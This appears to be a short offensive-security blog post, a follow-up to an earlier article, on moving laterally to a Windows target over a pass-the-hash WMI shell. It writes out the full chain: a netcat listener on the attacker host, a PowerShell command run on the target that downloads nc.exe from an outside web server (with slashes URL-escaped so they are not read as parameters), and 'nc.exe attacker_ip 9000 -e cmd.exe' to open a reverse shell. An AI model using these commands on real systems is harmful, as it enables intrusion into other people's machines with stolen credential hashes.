This time, lets introduce a variant of previous article.
Rather than copying a file to a target using a remote admin$ share (which is not always available), lets have the target download a file via http.
1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000
2.download a file from internet on a remote target
(remember, you are using a pth shell with proper logon details).
NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);
Notice the %2f in place of the ‘/’ – Indeed, we need to escape this as otherwise it would be understood as command line parameter.
3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe
At this point you will get a shell popup in your listening netcat.
Try a simple whoami for fun.